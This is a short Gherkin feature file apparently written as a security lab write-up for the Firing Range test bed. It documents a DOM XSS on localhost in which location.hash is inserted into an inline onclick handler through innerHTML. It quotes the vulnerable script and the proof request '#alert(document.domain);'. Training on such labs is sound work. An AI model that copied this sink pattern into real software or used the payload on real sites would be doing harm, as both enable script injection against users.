# language: en

Feature: Address DOM XSS - inline event handler
  From Firing Range System

  Background:
    Given I'm running Windows 10 Enterprise 1803 (17134.228)
    And also using Firefox version 61.0.2
    Given the following
    """
    URL: http://localhost:8080/address/location.hash/inlineevent
    Message: Address DOM XSS - inline event handler
    Details:
        - DOM xss with inline event handler
        - Run an alert with the domain name
    Objective: Perform an DOM xss with the location.hash
    """

  Scenario: Location.hash - inline event handler
    Given the inital site
    Then I inspect the page source code
    """
    <script>
      var payload = window.location.hash.substr(1);
      var div = document.createElement('div');
      div.innerHTML = '<div onclick=\'' +
      payload.replace(/'/g, '') + '\'>div</div>';
      document.documentElement.appendChild(div);
      </script>
    """
    Then I make a simple request
    """
    Request: ../address/location.hash/inlineevent#alert(document.domain);
    alert with localhost when i clink the div with 18 pixels
    """
    Then The vulnerability is verified